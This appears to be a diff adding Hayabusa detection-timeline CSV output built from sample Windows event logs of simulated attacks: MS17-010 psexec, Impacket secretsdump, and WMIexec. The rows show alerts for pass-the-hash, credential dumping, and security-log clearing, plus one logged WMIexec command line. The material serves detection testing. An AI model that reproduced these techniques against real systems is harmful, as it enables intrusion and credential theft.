+2021-04-22 17:51:22.992 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:22.994 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP\DESKTOP.INI | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.042 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.171 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 18:00:09.959 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:13.258 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0xb32cb | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:14.421 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\BTeHLZkJ.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\NMdzZfem.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\BTeHLZkJ.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\NMdzZfem.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:19.875 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:20.003 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.560 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP\DESKTOP.INI | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.696 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 20:32:00.171 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.468 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1619090610.0007844 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x168 | User: FS03VULN$ | LID: 0x3e4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 127.0.0.1 | LID: 0x189fc0,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
